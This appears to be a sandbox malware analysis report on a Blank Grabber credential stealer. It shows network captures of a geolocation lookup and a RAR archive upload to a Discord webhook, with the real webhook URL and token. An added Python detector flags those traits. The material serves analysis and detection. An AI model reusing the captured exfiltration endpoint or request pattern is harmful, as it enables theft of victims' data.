Jul 20, 2024 22:16:31.888386965 CEST | 49743 | 443 | 192.168.2.4 | 162.159.137.232
Jul 20, 2024 22:16:31.888442039 CEST | 49743 | 443 | 192.168.2.4 | 162.159.137.232
Jul 20, 2024 22:16:31.888477087 CEST | 49743 | 443 | 192.168.2.4 | 162.159.137.232
Jul 20, 2024 22:16:31.888536930 CEST | 49743 | 443 | 192.168.2.4 | 162.159.137.232
Jul 20, 2024 22:16:31.888583899 CEST | 49743 | 443 | 192.168.2.4 | 162.159.137.232
Jul 20, 2024 22:16:31.888622046 CEST | 49743 | 443 | 192.168.2.4 | 162.159.137.232
Jul 20, 2024 22:16:31.888622999 CEST | 49743 | 443 | 192.168.2.4 | 162.159.137.232
Jul 20, 2024 22:16:31.888663054 CEST | 49743 | 443 | 192.168.2.4 | 162.159.137.232
Jul 20, 2024 22:16:31.888699055 CEST | 49743 | 443 | 192.168.2.4 | 162.159.137.232
Jul 20, 2024 22:16:31.888725996 CEST | 49743 | 443 | 192.168.2.4 | 162.159.137.232
Jul 20, 2024 22:16:31.898308039 CEST | 443 | 49743 | 162.159.137.232 | 192.168.2.4
                                                            Jul 20, 2024 22:16:31.898610115 CEST49743443192.168.2.4162.159.137.232
                                                            Jul 20, 2024 22:16:31.898701906 CEST44349743162.159.137.232192.168.2.4
                                                            Jul 20, 2024 22:16:31.898772001 CEST49743443192.168.2.4162.159.137.232
                                                            Jul 20, 2024 22:16:31.898821115 CEST49743443192.168.2.4162.159.137.232
                                                            Jul 20, 2024 22:16:31.898823977 CEST44349743162.159.137.232192.168.2.4
                                                            Jul 20, 2024 22:16:31.898921013 CEST44349743162.159.137.232192.168.2.4
                                                            Jul 20, 2024 22:16:32.816890955 CEST44349743162.159.137.232192.168.2.4
                                                            Jul 20, 2024 22:16:32.817123890 CEST44349743162.159.137.232192.168.2.4
                                                            Jul 20, 2024 22:16:32.817205906 CEST44349743162.159.137.232192.168.2.4
                                                            Jul 20, 2024 22:16:32.817362070 CEST49743443192.168.2.4162.159.137.232
                                                            Jul 20, 2024 22:16:32.817399025 CEST44349743162.159.137.232192.168.2.4
                                                            Jul 20, 2024 22:16:32.817662954 CEST49743443192.168.2.4162.159.137.232
                                                            Jul 20, 2024 22:16:32.818172932 CEST49743443192.168.2.4162.159.137.232
                                                            Jul 20, 2024 22:16:32.933613062 CEST4974280192.168.2.4208.95.112.1
                                                            Jul 20, 2024 22:16:32.939532995 CEST8049742208.95.112.1192.168.2.4
                                                            Jul 20, 2024 22:16:32.939750910 CEST4974280192.168.2.4208.95.112.1
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 20, 2024 22:16:30.599179983 CEST | 53099 | 53 | 192.168.2.4 | 1.1.1.1
Jul 20, 2024 22:16:30.608401060 CEST | 53 | 53099 | 1.1.1.1 | 192.168.2.4
Jul 20, 2024 22:16:31.365683079 CEST | 51022 | 53 | 192.168.2.4 | 1.1.1.1
Jul 20, 2024 22:16:31.375628948 CEST | 53 | 51022 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jul 20, 2024 22:16:30.599179983 CEST | 192.168.2.4 | 1.1.1.1 | 0xf734 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Jul 20, 2024 22:16:31.365683079 CEST | 192.168.2.4 | 1.1.1.1 | 0xa79f | Standard query (0) | canary.discord.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jul 20, 2024 22:16:23.395530939 CEST | 1.1.1.1 | 192.168.2.4 | 0x1a0f | No error (0) | bg.microsoft.map.fastly.net |  | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Jul 20, 2024 22:16:23.395530939 CEST | 1.1.1.1 | 192.168.2.4 | 0x1a0f | No error (0) | bg.microsoft.map.fastly.net |  | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Jul 20, 2024 22:16:30.608401060 CEST | 1.1.1.1 | 192.168.2.4 | 0xf734 | No error (0) | ip-api.com |  | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Jul 20, 2024 22:16:31.375628948 CEST | 1.1.1.1 | 192.168.2.4 | 0xa79f | No error (0) | canary.discord.com |  | 162.159.137.232 | A (IP address) | IN (0x0001) | false
Jul 20, 2024 22:16:31.375628948 CEST | 1.1.1.1 | 192.168.2.4 | 0xa79f | No error (0) | canary.discord.com |  | 162.159.128.233 | A (IP address) | IN (0x0001) | false
Jul 20, 2024 22:16:31.375628948 CEST | 1.1.1.1 | 192.168.2.4 | 0xa79f | No error (0) | canary.discord.com |  | 162.159.138.232 | A (IP address) | IN (0x0001) | false
Jul 20, 2024 22:16:31.375628948 CEST | 1.1.1.1 | 192.168.2.4 | 0xa79f | No error (0) | canary.discord.com |  | 162.159.136.232 | A (IP address) | IN (0x0001) | false
Jul 20, 2024 22:16:31.375628948 CEST | 1.1.1.1 | 192.168.2.4 | 0xa79f | No error (0) | canary.discord.com |  | 162.159.135.232 | A (IP address) | IN (0x0001) | false
                                                            • canary.discord.com
                                                            • ip-api.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49742 | 208.95.112.1 | 80 | 7396 | C:\Users\user\Desktop\e45AiBoV6X.exe
Timestamp | Bytes transferred | Direction | Data
Jul 20, 2024 22:16:30.614850998 CEST | 116 | OUT | GET /json/?fields=225545 HTTP/1.1
                                                            Host: ip-api.com
                                                            Accept-Encoding: identity
                                                            User-Agent: python-urllib3/2.2.2
Jul 20, 2024 22:16:31.112606049 CEST | 379 | IN | HTTP/1.1 200 OK
                                                            Date: Sat, 20 Jul 2024 20:16:30 GMT
                                                            Content-Type: application/json; charset=utf-8
                                                            Content-Length: 202
                                                            Access-Control-Allow-Origin: *
                                                            X-Ttl: 60
                                                            X-Rl: 44
                                                            Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d
                                                            Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-33.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.33"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49743 | 162.159.137.232 | 443 | 7396 | C:\Users\user\Desktop\e45AiBoV6X.exe
Timestamp | Bytes transferred | Direction | Data
2024-07-20 20:16:31 UTC | 309 | OUT | POST /api/webhooks/1248781366489907321/ufb6qyCKcRyE7syQfJqh1lNQR64inZBSWaeenuFVMnWhurxQmS0fvG_72iP5niS7D08V HTTP/1.1
                                                            Host: canary.discord.com
                                                            Accept-Encoding: identity
                                                            Content-Length: 696330
                                                            User-Agent: python-urllib3/2.2.2
                                                            Content-Type: multipart/form-data; boundary=ee98191e18960bbd7c200f93a176e816
2024-07-20 20:16:31 UTC | 16384 | OUT | Data Raw: 2d 2d 65 65 39 38 31 39 31 65 31 38 39 36 30 62 62 64 37 63 32 30 30 66 39 33 61 31 37 36 65 38 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 42 6c 61 6e 6b 2d 6a 6f 6e 65 73 2e 72 61 72 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 61 72 21 1a 07 01 00 0a da fd 71 21 04 00 00 01 0f 3f d9 cc df 5f a6 f8 b9 13 e1 2b 6a 9d 8c 83 3b aa d1 49 ae 19 11 10 3b 4f bd 9c b8 4e a8 7a 84 7f ef 62 49 90 bc cc d8 59 c0 33 7a dd 2c 81 98 1c 23 dc 7f d8 c9 b2 6b 29 c2 1f a0 a4 50 3b aa e0 34 c8 ce c9 2b 50 ea 1e 2f 85 08 a1 8d 55 9d 15 c6 ea 48 4f d3
                                                            Data Ascii: --ee98191e18960bbd7c200f93a176e816Content-Disposition: form-data; name="file"; filename="Blank-user.rar"Content-Type: application/octet-streamRar!q!?_+j;I;ONzbIY3z,#k)P;4+P/UHO
2024-07-20 20:16:31 UTC | 16384 | OUT | Data Raw: ec a0 88 52 32 1d 5e a6 8a 65 db ae 74 19 25 dd c0 3a e8 19 2b 12 60 27 7e 85 21 e0 bf d2 02 d0 bc 46 10 4b b2 b8 d4 5f 32 7b a2 5c a5 47 47 a3 66 b3 31 d5 b3 8d f1 e1 32 17 ef 14 c4 ae 7d 3c b6 b6 1c c0 64 06 b4 cd 14 c6 0f 2b c2 f0 d6 7c 26 f0 2d f4 d2 ab e6 f1 46 b4 63 da 31 89 bb 04 45 9e 6c 8e 38 bb eb e4 33 e6 85 e2 96 e7 54 ca a5 52 ce 2e b2 92 c2 b8 ca 48 53 01 90 51 e9 f0 7c 9e cc d4 ef aa 48 16 f6 8f 6c 96 f9 2c d4 11 54 3d 44 e8 24 23 3d c9 15 72 3f e2 a5 35 7f f2 fd e6 21 c0 d4 b1 e4 73 77 04 1a e6 ed 5e 50 e1 87 c1 9b b3 71 18 a0 c7 23 99 fb c9 bd 92 9d ea c6 35 0b 00 2c bb 4a 09 39 8e 1e f3 95 5e 69 36 93 a8 96 b5 f8 37 2a 74 cf d3 c3 7c 63 05 d1 7d 95 f5 1e 5c 82 1b 86 bf 0b eb 3c f7 de bb 4b 82 51 4b 84 13 11 dc 3a 47 ca 47 67 fc 6e 8b 57
                                                            Data Ascii: R2^et%:+`'~!FK_2{\GGf12}<d+|&-Fc1El83TR.HSQ|Hl,T=D$#=r?5!sw^Pq#5,J9^i67*t|c}\<KQK:GGgnW
2024-07-20 20:16:31 UTC | 16384 | OUT | Data Raw: 76 42 0f 9b 24 2e 2e 67 5b 55 bc f8 51 a2 b8 85 46 2b e4 85 57 be 5d 0e 66 9e 65 79 a5 f9 f0 36 5a 76 26 22 e0 d1 28 64 40 f1 76 da 38 42 9d ea 9a 97 25 b3 97 a9 07 3f 64 a0 4d 54 d3 89 db 00 2b ec b4 f1 ac 18 3c 02 f0 24 cb d2 cc c2 6c e1 2d 02 7e 7c b3 10 07 0a f2 3c 50 06 a6 5b 7e 56 eb 99 29 d5 3c 7f e5 14 06 3a 4d 8c 06 04 e5 b5 5e 8f c7 b7 1c da fa 4c d6 4c 96 4a 6a 96 09 c0 35 3b 7f c9 21 b2 71 0d a5 a4 72 b1 f4 b4 54 53 db 88 3a 6c 48 4e a8 c1 70 65 0e ea 13 05 e5 a4 bc 2d 6b f0 12 45 51 f1 61 41 96 f8 53 66 f5 5d 19 33 c5 bc 00 7b e3 d1 bb d8 25 ce 68 a3 90 a3 cc b9 1d 8f 8e 37 ed c9 d3 53 c7 d6 3a 2a 02 70 4c 0e b9 c9 66 b1 49 ce ba a3 68 49 d3 d4 6a 0e 5f 1f 11 55 e7 fe d0 c3 44 01 87 1b 6a 1a 42 03 0f d4 9d 90 ba a4 7a 60 c4 d6 ac ce 04 4f 5f
                                                            Data Ascii: vB$..g[UQF+W]fey6Zv&"(d@v8B%?dMT+<$l-~|<P[~V)<:M^LLJj5;!qrTS:lHNpe-kEQaASf]3{%h7S:*pLfIhIj_UDjBz`O_
2024-07-20 20:16:31 UTC | 16384 | OUT | Data Raw: c8 0d dc 3b f1 ba 7e 74 4c aa 7e 7f d5 c8 d7 3e ac f4 56 18 d5 21 21 e4 bb 9e 2d ca 3b f3 97 86 1d 17 13 bc ec f4 90 a1 7d c7 df 0d 98 fb d7 08 b3 fe db 98 32 9c 18 b3 14 02 77 a9 66 6c 40 1b 67 73 51 18 64 5b f9 d4 fe 0d d1 82 2a f5 e3 37 59 56 a5 45 ac d9 2c 51 d9 d9 64 a1 42 d2 ba 19 38 93 0e 21 cb 16 d1 01 7a e4 f7 f8 9c a1 06 48 25 e9 2b 7e b3 dc c2 0f 7c 57 8d 02 86 4d ca 61 b5 89 f7 a9 d9 0b 77 76 ca 67 d1 52 eb 53 89 32 d7 21 ec 38 27 1b cf 52 59 ba aa 90 84 20 a0 b9 5d de d5 7f f8 9c 3e 14 8a ef 53 5f 01 c2 48 d7 5a cb 25 a6 ee c0 5a 18 5c ed 46 61 03 18 b1 55 bc c4 f8 bd 74 d8 6b 6b 45 44 f7 e4 8d f3 2b 1c b1 b8 0b 14 76 29 c1 be b2 a9 2f 91 a1 8a 84 df d8 a8 6f 26 6c 48 91 6d 32 89 d8 70 ce 08 b7 12 22 61 7a d0 31 7b 91 67 11 46 3d e0 27 26 28
                                                            Data Ascii: ;~tL~>V!!-;}2wfl@gsQd[*7YVE,QdB8!zH%+~|WMawvgRS2!8'RY ]>S_HZ%Z\FaUtkkED+v)/o&lHm2p"az1{gF='&(
2024-07-20 20:16:31 UTC | 16384 | OUT | Data Raw: f0 69 90 2e 83 8f 37 83 bb e4 d5 63 04 51 02 6a ee de b0 82 81 c6 28 09 0d fd 2c 51 2a 23 70 04 3b 64 c7 71 b6 f0 d1 b4 3b 46 38 b9 39 26 a2 26 72 88 da 4c a9 e1 a7 5e b5 6c 4e 69 5c 2c d8 1b a6 a2 29 39 f0 d2 e4 fd 08 18 58 71 70 9d f0 3a c6 d5 41 03 8a 0a 2d 21 ad 72 eb 37 11 94 30 0d a9 a2 dd ef 67 25 33 db c8 6f aa 8e e4 ef f1 05 8f 1a d6 3b 05 8a a8 32 3e 12 53 8c 6f 31 c0 85 e1 d2 55 84 ec b8 97 75 fa e7 69 25 11 0a 60 df eb 0f fd f2 6d a4 0a 8f 83 79 bf 67 4c fc fa 38 58 27 2e 23 3f 8a bb 96 26 e4 b6 56 1a ea 32 95 3d 6d 8b 7d 65 d6 b8 62 21 24 19 74 41 7d 88 c5 4d b6 91 be 92 87 40 c2 81 08 19 06 3d e6 ae c4 14 cf d7 58 6f 3f 24 e4 4a 31 11 ec 8f 27 bb 70 92 92 00 58 79 78 aa 6e 29 7f 64 8a ac 4e 46 03 02 58 3d 6e 51 2e 52 dd 25 81 c0 ca 24 3a c1
                                                            Data Ascii: i.7cQj(,Q*#p;dq;F89&&rL^lNi\,)9Xqp:A-!r70g%3o;2>So1Uui%`mygL8X'.#?&V2=m}eb!$tA}M@=Xo?$J1'pXyxn)dNFX=nQ.R%$:
2024-07-20 20:16:31 UTC | 16384 | OUT | Data Raw: f3 7e c6 e2 d1 08 ef 55 5c fb 6a 25 36 4b 0c 20 41 8d 30 11 56 f3 73 e9 48 8a aa c0 60 31 89 6f cb a6 51 87 45 b1 bb 63 f6 b2 a0 bc 8e e8 50 89 88 a1 2a 0f 5d 72 d0 fd 0b dc 72 bd 44 0a d0 42 ed 75 f7 4b c0 a4 bd e6 b6 23 5a ce d2 30 9f 4c 81 20 93 fc 94 9d cc e4 fd c9 3e c7 1f 82 3a f0 fa d6 42 93 97 d5 75 53 c0 26 dd 73 97 43 24 f3 dd d7 da dc c6 bc e0 b5 f8 52 89 ce 50 d6 c7 2c 04 65 54 5b bd 78 b3 cd 76 3e a7 81 3a 56 ca 5b 17 92 63 27 f9 58 0e d4 fc 60 66 01 d4 0b cb 82 1c f7 91 f2 f1 4b 61 92 ef cb 6b ad 13 db 17 07 12 77 89 f7 2d 74 71 9a 2d 85 a0 f5 ee 71 6c e4 48 db 4a 9c 03 07 f3 cc 91 1b 61 98 7b 1a d8 aa 33 fc db df c1 38 1c d7 e3 4a 45 73 b9 d5 52 83 32 04 a7 02 9a 04 28 6a 9a fc e8 e4 1d ba 39 50 7e c5 49 a9 9e c9 5c 3c d3 68 e3 6f a9 ec 05
                                                            Data Ascii: ~U\j%6K A0VsH`1oQEcP*]rrDBuK#Z0L >:BuS&sC$RP,eT[xv>:V[c'X`fKakw-tq-qlHJa{38JEsR2(j9P~I\<ho
2024-07-20 20:16:31 UTC | 16384 | OUT | Data Raw: 26 84 34 4b e3 e5 04 1d 42 3e 20 db 06 38 8b 83 9d d7 c0 97 06 06 99 e1 6d db 8e e4 93 03 24 db ef ff 96 40 51 04 0e 69 eb 2b 28 2f 79 11 8c 75 c7 71 bf dc a3 11 28 20 cb 51 7d b5 12 4b fc 16 31 e9 c5 95 c4 b9 18 ac 84 0d fa 62 c9 c2 c2 f5 12 4d be 2b cc 6b 15 f2 2a 56 43 79 55 1d c0 b9 de ea 98 28 54 2f 9c 35 35 72 f5 62 46 1b 2c 70 78 eb e3 65 8c fc 74 3a 21 74 53 ad eb 2a e8 73 b9 d2 bd a6 09 cd 9e 95 5a 04 f7 59 c7 1c 19 44 99 c5 b2 e5 be 11 9c c8 4e 04 11 30 71 84 61 e0 81 c2 c2 0c 18 46 ec 4c 84 31 25 96 95 15 58 4e 7b 69 43 1c 92 9e 9c 37 b8 dc 2c d4 d4 bb a6 64 b4 e9 5b c6 7d 09 32 5f 71 50 55 b5 76 12 47 85 c3 09 0f 56 c3 6b ab 22 43 d2 b9 5f 72 c5 97 c9 ea f6 16 6c 42 de df dc df d2 c3 f4 6c 96 24 61 60 6f 22 76 dd ff a8 ba 5b 71 fa dd 2e 09 70
                                                            Data Ascii: &4KB> 8m$@Qi+(/yuq( Q}K1bM+k*VCyU(T/55rbF,pxet:!tS*sZYDN0qaFL1%XN{iC7,d[}2_qPUvGVk"C_rlBl$a`o"v[q.p
2024-07-20 20:16:31 UTC | 16384 | OUT | Data Raw: d6 ce b5 52 09 0c 3b 11 2d 59 93 0d d1 8c da 6b b8 13 4c 4f ce f7 57 c7 5d 7a 4d 90 a3 ad 66 05 70 45 ec 4d 23 2c e2 0c 76 86 31 db 3f 8d 24 a9 b5 d1 58 62 9f 4d 4a 15 71 6f 91 56 a0 7d e0 32 ba 74 9f 78 72 6b 96 88 fc fa a5 ee 32 b5 35 17 1e 08 f4 be aa 3c 5d 02 ca 9f 36 1d 37 42 05 de 8e e6 c4 c2 2c 07 5d 76 e2 2e 24 ea 62 68 8d af 06 d0 f0 3d c2 4f 87 19 ed d4 26 22 70 b4 c6 cb c0 9d 44 c3 a3 75 02 04 76 bf a7 ae 73 9a 97 f3 15 fe aa ba ef a4 ed e8 d5 5f 34 3b a5 15 2d ce dc 56 e7 42 f7 f0 b2 9d 35 32 47 89 9e 84 1c 27 4c b6 86 4c eb 06 b4 c8 9b 2c 18 f5 98 87 3b 63 d9 1a 84 d3 b1 e8 9a 2f b7 e7 d1 58 90 49 9d 66 ac 20 d4 73 e8 25 1c bb d0 98 f7 3c b1 82 71 cf 04 f4 7c 86 80 5a a2 3a ad 10 34 34 0f 2f d1 cc bb 34 59 0d d0 af 44 00 ba 9f e3 be f4 69 3f
                                                            Data Ascii: R;-YkLOW]zMfpEM#,v1?$XbMJqoV}2txrk25<]67B,]v.$bh=O&"pDuvs_4;-VB52G'LL,;c/XIf s%<q|Z:44/4YDi?
2024-07-20 20:16:31 UTC | 16384 | OUT | Data Raw: 53 f6 11 54 61 7e 5f 23 37 de 7f 7d b0 6c ac 45 b1 a7 d0 dd 0f db 46 e5 c0 8f 02 2d d3 3f 6a 92 13 49 c4 3d 06 57 92 92 63 6b b7 e9 ef 16 99 cd 28 c0 da 92 19 6a 11 cf 40 c3 34 b3 56 22 32 78 20 2f 58 55 5b e7 d4 8d 8a 9b 92 ce bd d0 f3 71 d9 a9 56 15 77 39 48 87 ef f7 0f 6e c4 11 eb 97 34 eb f2 f7 7b fc be d5 55 d0 dc 0f ee 13 d3 a6 9b ae 93 2e 4c 76 5f b4 79 ce 93 2e 7d f6 7d b4 b5 b2 1c 3f f0 49 f7 7b 53 63 4a 54 26 92 88 cd 22 77 3a 4b 65 7a 65 f3 91 a6 28 7f ec 15 a5 ba 05 9f 9f 4e 99 bc f5 31 24 92 14 09 4a 3c 80 de a7 2a 0c 99 72 e6 54 26 c2 b9 ae e9 72 3e c6 fe ba e9 07 8d a9 c4 e3 74 76 f8 eb 55 fe 10 45 42 30 a7 06 f7 d8 f4 70 4c 09 82 8c de 1f 1e 60 74 40 ea 56 64 18 95 e9 0a 91 d0 73 5f 68 d9 2b c9 57 0c 03 bd cf 7c 74 d9 b7 60 f6 76 10 78 43
                                                            Data Ascii: STa~_#7}lEF-?jI=Wck(j@4V"2x /XU[qVw9Hn4{U.Lv_y.}}?I{ScJT&"w:Keze(N1$J<*rT&r>tvUEB0pL`t@Vds_h+W|t`vxC
2024-07-20 20:16:31 UTC | 16384 | OUT | Data Raw: f7 6d 01 09 2e 8c b8 a4 e2 68 86 b6 32 99 d7 a3 6b 92 eb 39 c0 19 fb 71 25 22 c3 dd 5f 3f 62 1a cc a4 d3 d4 6f a8 18 5c 2c bd 5a e7 f7 7a a8 8a 83 4d 20 cc 1c ac d8 62 35 a9 f4 13 ff 24 fd ca 3d 58 8b 3b b6 9e 76 c7 57 62 fc 60 0a fe 2b 5c af 12 7f a4 ae ad ac 12 27 e3 37 8f 24 84 31 fd 25 26 e6 1c c1 d4 0c 89 be 17 22 85 5b d9 df 6e 54 d7 91 bf 03 65 11 bd fb e8 1a d7 fc e3 b5 97 1a 56 70 97 99 fd 40 a0 5a a1 00 f8 2a 2e 72 68 b3 cf 15 47 53 11 fc 12 2b 7b af ea 17 48 3a c3 2d 0b 9e c1 27 b1 7d 3f 58 71 24 9d 50 0a da bf a7 23 24 dc a2 33 72 97 88 5c 97 6e f2 77 cf ce 7d 43 63 3e 09 f4 7c ef df 5d c9 02 66 f7 d8 9a 38 e3 c4 72 43 48 79 65 6c 30 1c 58 8e 14 4a f0 a0 92 f0 3a b2 35 a6 1b 8a ea 08 47 56 de f4 2f 7c 5c 47 ed f3 3f e6 85 15 34 0a 27 00 1b 65
                                                            Data Ascii: m.h2k9q%"_?bo\,ZzM b5$=X;vWb`+\'7$1%&"[nTeVp@Z*.rhGS+{H:-'}?Xq$P#$3r\nw}Cc>|]f8rCHyel0XJ:5GV/|\G?4'e
2024-07-20 20:16:32 UTC | 1239 | IN | HTTP/1.1 200 OK
                                                            Date: Sat, 20 Jul 2024 20:16:32 GMT
                                                            Content-Type: application/json
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            CF-Ray: 8a65a1279d6572b7-EWR
                                                            CF-Cache-Status: DYNAMIC
                                                            Set-Cookie: __dcfduid=f4e6b77e46d411efb37faa1e6a0ff386; Expires=Thu, 19-Jul-2029 20:16:32 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                            Vary: Accept-Encoding
                                                            Via: 1.1 google
                                                            alt-svc: h3=":443"; ma=86400
                                                            X-Content-Type-Options: nosniff
                                                            x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                            x-ratelimit-limit: 5
                                                            x-ratelimit-remaining: 4
                                                            x-ratelimit-reset: 1721506593
                                                            x-ratelimit-reset-after: 1
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2L3VMy9NAmbPhLy4j11tEGpQBpQ16ADtQv%2Bs5F9eO98hgB9PPy5LdFCUVyk%2BSjA6J%2BM3U54hKHRGB8T0umr47xYZyczO2yqxdNVWAwOVNRSF2oO6SBphrS%2FoLZ7p5MfLdYbp1w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Content-Security-Policy: frame-ancestors 'none'; default-src https://o64374.ingest.sentry.io; report-to csp-sentry; report-uri https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870
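The two conversations above are the whole stealer life cycle on the wire: one unauthenticated GET to ip-api.com to learn the victim's public IP and location, then a single multipart POST of a ~680 KB RAR archive to a Discord webhook, both sent with the default python-urllib3 User-Agent that a PyInstaller-packed .exe still announces. The following is an added example, not code from the Joe Sandbox report or from the sample, that parses request heads in the form shown above and raises one finding per indicator. The two sample requests are constructed from the captured method, path, host and headers; the webhook token is replaced by a placeholder of the same length, and the two extra geolocation hosts are an assumption, not something this report observed.

```python
"""Flag the stealer beacon-and-exfil pattern in captured HTTP request heads.

Added example, not code from the Joe Sandbox report or from the sample: the
two requests are reconstructed from the conversations in the report, with the
Discord webhook token replaced by a constructed placeholder of the same length.
"""
import re
from dataclasses import dataclass

# Constructed from the captured conversations (same method, path, host and
# headers as the report shows). The token is a placeholder, not the real one.
PLACEHOLDER_TOKEN = "x" * 68
SAMPLE_REQUESTS = [
    "GET /json/?fields=225545 HTTP/1.1\r\n"
    "Host: ip-api.com\r\n"
    "Accept-Encoding: identity\r\n"
    "User-Agent: python-urllib3/2.2.2\r\n\r\n",
    f"POST /api/webhooks/1248781366489907321/{PLACEHOLDER_TOKEN} HTTP/1.1\r\n"
    "Host: canary.discord.com\r\n"
    "Accept-Encoding: identity\r\n"
    "Content-Length: 696330\r\n"
    "User-Agent: python-urllib3/2.2.2\r\n"
    "Content-Type: multipart/form-data; boundary=ee98191e18960bbd7c200f93a176e816\r\n\r\n",
]

# ip-api.com is the service this sample used; the other two are common
# alternatives added here as an assumption, not taken from the report.
GEOIP_HOSTS = {"ip-api.com", "ipinfo.io", "api.ipify.org"}
PYTHON_UA_PREFIXES = ("python-urllib3/", "python-requests/")
# Discord webhook URLs are /api/webhooks/<snowflake id>/<token>.
WEBHOOK_PATH = re.compile(r"^/api/webhooks/(\d{17,20})/([A-Za-z0-9_-]{40,})$")


@dataclass
class HttpRequest:
    method: str
    path: str
    headers: dict[str, str]  # header names lower-cased


@dataclass
class Finding:
    rule: str
    detail: str


def parse_request(raw: str) -> HttpRequest:
    """Split a raw request head into method, path and a lower-cased header map."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers: dict[str, str] = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, path, headers)


def analyze(req: HttpRequest) -> list[Finding]:
    """Return one Finding per matched indicator, in a fixed order."""
    findings: list[Finding] = []
    host = req.headers.get("host", "").lower()
    ua = req.headers.get("user-agent", "")
    # A packed Python binary keeps the library's default User-Agent.
    if ua.startswith(PYTHON_UA_PREFIXES):
        findings.append(Finding("python-http-client", f"{ua} -> {host}"))
    if host in GEOIP_HOSTS:
        findings.append(Finding("geoip-lookup", f"{req.method} {host}{req.path}"))
    m = WEBHOOK_PATH.match(req.path)
    if m and req.method == "POST" and host.endswith("discord.com"):
        size = int(req.headers.get("content-length", "0"))
        detail = f"webhook id {m.group(1)}, {size} bytes"
        if req.headers.get("content-type", "").startswith("multipart/form-data"):
            detail += ", multipart file upload"
        findings.append(Finding("discord-webhook-post", detail))
    return findings


def scan(raw_requests: list[str]) -> list[Finding]:
    """Analyze every request head and concatenate the findings in request order."""
    findings: list[Finding] = []
    for raw in raw_requests:
        findings.extend(analyze(parse_request(raw)))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_REQUESTS):
        print(f"{f.rule:24} {f.detail}")
```

The webhook ID (the 19-digit snowflake) is the durable indicator to pivot on: it survives the token being rotated and is what you hand to Discord when reporting the endpoint. The Content-Length of 696330 against the ten 16384-byte chunks shown above and the 200 OK that follows tells you the whole archive left the host before the connection closed; there is nothing left to block on this session, only to hunt for on other hosts.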


                                                            Target ID:0
                                                            Start time:16:16:05
                                                            Start date:20/07/2024
                                                            Path:C:\Users\user\Desktop\e45AiBoV6X.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Users\user\Desktop\e45AiBoV6X.exe"
                                                            Imagebase:0x7ff6fb1e0000
                                                            File size:6'146'615 bytes
                                                            MD5 hash:3E6D7972822636F67CCF275EBD140188
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.1720264732.000001F32EEE2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.1720264732.000001F32EEE4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:1
                                                            Start time:16:16:05
                                                            Start date:20/07/2024
                                                            Path:C:\Users\user\Desktop\e45AiBoV6X.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Users\user\Desktop\e45AiBoV6X.exe"
                                                            Imagebase:0x7ff6fb1e0000
                                                            File size:6'146'615 bytes
                                                            MD5 hash:3E6D7972822636F67CCF275EBD140188
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
